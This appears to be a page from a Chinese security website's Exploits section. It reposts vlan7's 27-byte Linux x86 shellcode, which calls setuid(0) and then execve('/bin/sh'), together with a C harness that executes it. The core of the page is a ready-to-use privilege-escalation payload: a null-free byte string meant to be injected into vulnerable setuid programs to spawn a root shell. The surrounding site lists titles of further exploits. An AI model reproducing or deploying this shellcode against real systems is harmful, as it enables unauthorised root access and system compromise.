首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux/x86 setuid(0) && execve(/bin/sh,0,0) shellcode 27 bytes
来源:http://www.vlan7.org 作者:vlan7 发布时间:2010-08-16  
#Special Thanks Inj3ct0r Exploit DataBase
#I Love Inj3ct0r.Com
#include <stdio.h>

const char sc[]= "\x31\xdb" //xor ebx,ebx
"\x8d\x43\x17" //LEA eax,[ebx + 0x17] /LEA is FASTER than push/pop!
"\x99" //cdq
"\xcd\x80" //int 80 //setuid(0) should returns 0 right? ;)
"\xb0\x0b" //mov al,0bh
"\x52" //push edx /Termina la cadena //bin/sh con un 0
"\x68\x6e\x2f\x73\x68" //push dword "hs/n"
"\x68\x2f\x2f\x62\x69" //push dword "ib//"
"\x89\xe3" //mov ebx,edx
"\x89\xd1" //mov ecx,edx
"\xcd\x80"; //int 80h

int main()
{
printf("\nSMALLEST SETUID && EXECVE GNU/LINUX x86 STABLE SHELLCODE "
"WITHOUT NULLS THAT SPAWNS A SHELL"
"\n\nCoded by vlan7"
"\n\t + http://www.vlan7.org"
"\n\n[+] Date: 4/Jul/2009"
"\n[+] Thanks to: sch3m4"
"\n\n[+] Shellcode Size: %d bytes\n\n", sizeof(sc)-1);
(*(void (*)()) sc)();
return 0;
}

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 setuid(0) && execve(
·123 Flashchat version 7.8 Mult
·Safari for windows Long link D
·MUSE v4.9.0.006 (.m3u) Local B
·K-Meleon for windows about net
·MUSE v4.9.0.006 (.pls) Local U
·CMSQLite <= 1.2 & CMySQLite <=
·Dlink WBR-2310 Wireless Router
·Rosoft media player 4.4.4 SEH
·Microsoft Windows nt!NtCreateT
·Computer Associates Advantage
·Microsoft Windows KTM Invalid
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved